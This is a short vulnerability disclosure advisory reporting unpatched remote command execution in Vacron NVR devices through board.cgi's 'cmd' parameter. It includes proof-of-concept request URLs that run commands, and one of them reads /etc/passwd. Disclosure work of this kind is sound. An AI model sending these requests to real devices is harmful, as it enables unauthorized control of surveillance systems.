SSD Advisory – Vacron NVR Remote Command Execution
The following advisory describes a remote command execution vulnerability.
VACRON Specializing in “various types of mobile monitoring, CCTV monitoring system, IP remote image monitoring system monitoring and other related production, and can accept ODM, OEM and other customized orders, the main products: driving recorder, CCTV analog monitoring system, CMS, IP Cam, etc.”
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
We tried to contact Vacron since September 5 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for the vulnerability.
User controlled input is not sufficiently sanitized when passed to board.cgi.
board.cgi receives a parameter as input. When we pass cmd as a parameter input, we will execute arbitrary commands.
Proof of Concept
http://IP/board.cgi?cmd=ifconfig http://IP/board.cgi?cmd=cat+/etc/passwd http:/IP/board.cgi?cmd=ls+../../../